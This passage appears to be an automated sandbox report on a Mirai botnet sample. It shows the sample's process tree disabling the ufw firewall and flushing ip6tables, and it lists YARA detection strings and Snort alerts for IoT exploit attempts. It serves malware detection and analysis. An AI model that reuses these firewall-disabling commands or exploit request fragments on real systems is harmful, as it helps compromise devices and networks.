ip6tables (PID: 6394, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-output

ufw-init New Fork (PID: 6395, Parent: 6277)

ip6tables (PID: 6395, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-logging-deny

ufw-init New Fork (PID: 6396, Parent: 6277)

ip6tables (PID: 6396, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-logging-allow

ufw-init New Fork (PID: 6397, Parent: 6277)

ip6tables (PID: 6397, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-not-local

ufw-init New Fork (PID: 6398, Parent: 6277)

ip6tables (PID: 6398, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-input

ufw-init New Fork (PID: 6399, Parent: 6277)

ip6tables (PID: 6399, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-limit-accept

ufw-init New Fork (PID: 6400, Parent: 6277)

ip6tables (PID: 6400, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-limit

ufw-init New Fork (PID: 6401, Parent: 6277)

ip6tables (PID: 6401, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-input

ufw-init New Fork (PID: 6402, Parent: 6277)

ip6tables (PID: 6402, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-input

ufw-init New Fork (PID: 6403, Parent: 6277)

ip6tables (PID: 6403, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-input

ufw-init New Fork (PID: 6404, Parent: 6277)

ip6tables (PID: 6404, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-input

ufw-init New Fork (PID: 6405, Parent: 6277)

ip6tables (PID: 6405, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-input

ufw-init New Fork (PID: 6406, Parent: 6277)

ip6tables (PID: 6406, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-input

ufw-init New Fork (PID: 6407, Parent: 6277)

ip6tables (PID: 6407, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-input

ufw-init New Fork (PID: 6408, Parent: 6277)

ip6tables (PID: 6408, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-forward

ufw-init New Fork (PID: 6409, Parent: 6277)

ip6tables (PID: 6409, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-forward

ufw-init New Fork (PID: 6410, Parent: 6277)

ip6tables (PID: 6410, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-forward

ufw-init New Fork (PID: 6411, Parent: 6277)

ip6tables (PID: 6411, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-forward

ufw-init New Fork (PID: 6412, Parent: 6277)

ip6tables (PID: 6412, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-forward

ufw-init New Fork (PID: 6413, Parent: 6277)

ip6tables (PID: 6413, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-forward

ufw-init New Fork (PID: 6414, Parent: 6277)

ip6tables (PID: 6414, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-forward

ufw-init New Fork (PID: 6415, Parent: 6277)

ip6tables (PID: 6415, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-forward

ufw-init New Fork (PID: 6416, Parent: 6277)

ip6tables (PID: 6416, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-forward

ufw-init New Fork (PID: 6417, Parent: 6277)

ip6tables (PID: 6417, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-output

ufw-init New Fork (PID: 6418, Parent: 6277)

ip6tables (PID: 6418, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-input

ufw-init New Fork (PID: 6419, Parent: 6277)

ip6tables (PID: 6419, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-output

ufw-init New Fork (PID: 6420, Parent: 6277)

ip6tables (PID: 6420, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-output

ufw-init New Fork (PID: 6421, Parent: 6277)

ip6tables (PID: 6421, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-output

ufw-init New Fork (PID: 6422, Parent: 6277)

ip6tables (PID: 6422, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-output

ufw-init New Fork (PID: 6423, Parent: 6277)

ip6tables (PID: 6423, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-output

ufw-init New Fork (PID: 6424, Parent: 6277)

ip6tables (PID: 6424, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-output

ufw-init New Fork (PID: 6425, Parent: 6277)

ip6tables (PID: 6425, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-output

ufw-init New Fork (PID: 6426, Parent: 6277)

ip6tables (PID: 6426, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-output

ufw-init New Fork (PID: 6427, Parent: 6277)

ip6tables (PID: 6427, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-logging-deny

ufw-init New Fork (PID: 6428, Parent: 6277)

ip6tables (PID: 6428, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-logging-allow

ufw-init New Fork (PID: 6429, Parent: 6277)

ip6tables (PID: 6429, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-not-local

ufw-init New Fork (PID: 6430, Parent: 6277)

ip6tables (PID: 6430, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-input

ufw-init New Fork (PID: 6431, Parent: 6277)

ip6tables (PID: 6431, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-output

ufw-init New Fork (PID: 6432, Parent: 6277)

ip6tables (PID: 6432, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-forward

ufw-init New Fork (PID: 6433, Parent: 6277)

ip6tables (PID: 6433, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-limit-accept

ufw-init New Fork (PID: 6434, Parent: 6277)

ip6tables (PID: 6434, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-limit

ufw-init New Fork (PID: 6435, Parent: 6277)

ip6tables (PID: 6435, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-input

ufw-init New Fork (PID: 6436, Parent: 6277)

ip6tables (PID: 6436, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-forward

ufw-init New Fork (PID: 6437, Parent: 6277)

ip6tables (PID: 6437, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-output

ufw-init New Fork (PID: 6438, Parent: 6277)

ip6tables (PID: 6438, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-input

ufw-init New Fork (PID: 6439, Parent: 6277)

ip6tables (PID: 6439, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-output

ufw-init New Fork (PID: 6440, Parent: 6277)

ip6tables (PID: 6440, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-forward

ufw-init New Fork (PID: 6441, Parent: 6277)

ip6tables (PID: 6441, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P INPUT ACCEPT

ufw-init New Fork (PID: 6442, Parent: 6277)

ip6tables (PID: 6442, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P OUTPUT ACCEPT

ufw-init New Fork (PID: 6443, Parent: 6277)

ip6tables (PID: 6443, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P FORWARD ACCEPT

4lXTg8P7Ih.elf New Fork (PID: 6444, Parent: 6225)

sh (PID: 6444, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl disable ufw >/dev/null 2>&1"

sh New Fork (PID: 6446, Parent: 6444)

systemctl (PID: 6446, Parent: 6444, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl disable ufw

systemctl New Fork (PID: 6447, Parent: 6446)

systemd-sysv-install (PID: 6447, Parent: 6446, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/systemd/systemd-sysv-install disable ufw

systemd-sysv-install New Fork (PID: 6448, Parent: 6447)

getopt (PID: 6448, Parent: 6447, MD5: 1a12f43596437b1bf346d52618b3b1b7) Arguments: getopt -o r: --long root: -- disable ufw

systemd-sysv-install New Fork (PID: 6449, Parent: 6447)

update-rc.d (PID: 6449, Parent: 6447, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d ufw defaults

update-rc.d New Fork (PID: 6450, Parent: 6449)

systemctl (PID: 6450, Parent: 6449, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

systemd-sysv-install New Fork (PID: 6464, Parent: 6447)

update-rc.d (PID: 6464, Parent: 6447, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d ufw disable

update-rc.d New Fork (PID: 6465, Parent: 6464)

systemctl (PID: 6465, Parent: 6464, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

4lXTg8P7Ih.elf New Fork (PID: 6472, Parent: 6225)

sh (PID: 6472, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl stop ufw >/dev/null 2>&1"

sh New Fork (PID: 6474, Parent: 6472)

systemctl (PID: 6474, Parent: 6472, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop ufw

4lXTg8P7Ih.elf New Fork (PID: 6479, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6483, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6486, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6487, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6489, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6492, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6493, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6495, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6498, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6501, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6502, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6504, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6506, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6508, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6510, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6512, Parent: 6225)

4lXTg8P7Ih.elf New Fork (PID: 6514, Parent: 6225)

systemd New Fork (PID: 6452, Parent: 6451)

snapd-env-generator (PID: 6452, Parent: 6451, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6467, Parent: 6466)

snapd-env-generator (PID: 6467, Parent: 6466, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6470, Parent: 6469)

snapd-env-generator (PID: 6470, Parent: 6469, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6475, Parent: 1)

ufw-init (PID: 6475, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/ufw/ufw-init stop

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
4lXTg8P7Ih.elf	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
4lXTg8P7Ih.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
4lXTg8P7Ih.elf	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x21108:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
4lXTg8P7Ih.elf	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x21cd0:$s1: LCOGQGPTGP 0x211cc:$s3: CFOKLKQVPCVMP 0x211b0:$s4: QWRGPTKQMP 0x21698:$s4: QWRGPTKQMP 0x21114:$s5: HWCLVGAJ
4lXTg8P7Ih.elf	MAL_ELF_LNX_Mirai_Oct10_1	Detects ELF Mirai variant	Florian Roth	0x1f511:$x2: /bin/busybox chmod 777 * /tmp/ 0x1f280:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x21108:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x21cd0:$s1: LCOGQGPTGP 0x211cc:$s3: CFOKLKQVPCVMP 0x211b0:$s4: QWRGPTKQMP 0x21698:$s4: QWRGPTKQMP 0x21114:$s5: HWCLVGAJ
6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_1	Detects ELF Mirai variant	Florian Roth	0x1f511:$x2: /bin/busybox chmod 777 * /tmp/ 0x1f280:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x21108:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x21cd0:$s1: LCOGQGPTGP 0x211cc:$s3: CFOKLKQVPCVMP 0x211b0:$s4: QWRGPTKQMP 0x21698:$s4: QWRGPTKQMP 0x21114:$s5: HWCLVGAJ
6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_1	Detects ELF Mirai variant	Florian Roth	0x1f511:$x2: /bin/busybox chmod 777 * /tmp/ 0x1f280:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x21108:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x21cd0:$s1: LCOGQGPTGP 0x211cc:$s3: CFOKLKQVPCVMP 0x211b0:$s4: QWRGPTKQMP 0x21698:$s4: QWRGPTKQMP 0x21114:$s5: HWCLVGAJ
6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_1	Detects ELF Mirai variant	Florian Roth	0x1f511:$x2: /bin/busybox chmod 777 * /tmp/ 0x1f280:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x21108:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x21cd0:$s1: LCOGQGPTGP 0x211cc:$s3: CFOKLKQVPCVMP 0x211b0:$s4: QWRGPTKQMP 0x21698:$s4: QWRGPTKQMP 0x21114:$s5: HWCLVGAJ
6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_1	Detects ELF Mirai variant	Florian Roth	0x1f511:$x2: /bin/busybox chmod 777 * /tmp/ 0x1f280:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Process Memory Space: 4lXTg8P7Ih.elf PID: 6225	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: 4lXTg8P7Ih.elf PID: 6479	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: 4lXTg8P7Ih.elf PID: 6483	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: 4lXTg8P7Ih.elf PID: 6486	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Click to see the 19 entries

Snort Signatures

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.95.34

Timestamp:	03/18/24-09:58:54.707354
SID:	2018132
Source Port:	39704
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 202.24.188.26

Timestamp:	03/18/24-09:59:05.741682
SID:	2030092
Source Port:	55910
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.120.103.192

Timestamp:	03/18/24-09:58:22.043283
SID:	2023548
Source Port:	56160
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.9.103

Timestamp:	03/18/24-09:58:13.406231
SID:	2018132
Source Port:	52222
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 59.2.75.81

Timestamp:	03/18/24-09:58:35.492324
SID:	2023548
Source Port:	56628
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.118.239.162

Timestamp:	03/18/24-09:58:57.027479
SID:	2025883
Source Port:	41408
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 93.99.127.188

Timestamp:	03/18/24-09:58:11.897601
SID:	2030092
Source Port:	53524
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.105.227.228

Timestamp:	03/18/24-09:59:21.589219
SID:	2018132
Source Port:	54314
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.40.210.21

Timestamp:	03/18/24-09:58:19.108087
SID:	2030092
Source Port:	50282
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.177.237

Timestamp:	03/18/24-09:58:49.487421
SID:	2018132
Source Port:	56332
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 4.156.170.124

Timestamp:	03/18/24-09:59:25.020215
SID:	2030092
Source Port:	47032
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.105.207.193

Timestamp:	03/18/24-09:59:36.649654
SID:	2018132
Source Port:	47426
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 54.192.154.194

Timestamp:	03/18/24-10:00:16.482994
SID:	2025576
Source Port:	58498
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 92.248.32.183

Timestamp:	03/18/24-09:58:21.190866
SID:	2025883
Source Port:	59506
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 61.56.208.203

Timestamp:	03/18/24-09:59:20.806234
SID:	2030092
Source Port:	40270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.97.180.200

Timestamp:	03/18/24-09:58:34.930753
SID:	2023548
Source Port:	46616
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.231.47.139

Timestamp:	03/18/24-10:00:22.108659
SID:	2023548
Source Port:	53308
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 64.23.148.185

Timestamp:	03/18/24-09:59:44.117506
SID:	2030092
Source Port:	58998
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.239.232.48

Timestamp:	03/18/24-10:00:24.681621
SID:	2025883
Source Port:	60148
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 63.32.158.60

Timestamp:	03/18/24-09:59:25.280404
SID:	2025576
Source Port:	50944
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 64.28.102.221

Timestamp:	03/18/24-09:59:05.873090
SID:	2030092
Source Port:	43628
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.89.90.84

Timestamp:	03/18/24-09:58:18.269636
SID:	2023548
Source Port:	34456
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.73.98

Timestamp:	03/18/24-09:58:43.187337
SID:	2018132
Source Port:	59000
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.120.103.192

Timestamp:	03/18/24-09:58:22.134345
SID:	2023548
Source Port:	56230
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 40.76.156.8

Timestamp:	03/18/24-09:56:59.880834
SID:	2025883
Source Port:	35822
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 38.11.227.79

Timestamp:	03/18/24-09:58:21.284307
SID:	2030092
Source Port:	56578
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.186.240.82

Timestamp:	03/18/24-09:58:29.754253
SID:	2023548
Source Port:	46390
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 200.104.229.105

Timestamp:	03/18/24-09:58:21.460904
SID:	2023548
Source Port:	50372
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 187.109.111.85

Timestamp:	03/18/24-09:58:30.740638
SID:	2025576
Source Port:	58400
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 138.100.239.142

Timestamp:	03/18/24-09:59:42.236372
SID:	2030092
Source Port:	35814
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.57.187.50

Timestamp:	03/18/24-10:00:10.177570
SID:	2030092
Source Port:	55482
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.77.20.225

Timestamp:	03/18/24-09:58:12.358776
SID:	2023548
Source Port:	56728
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 39.25.64.67

Timestamp:	03/18/24-09:59:37.294380
SID:	2023548
Source Port:	49098
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 43.143.211.162

Timestamp:	03/18/24-09:58:27.368205
SID:	2025883
Source Port:	59206
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

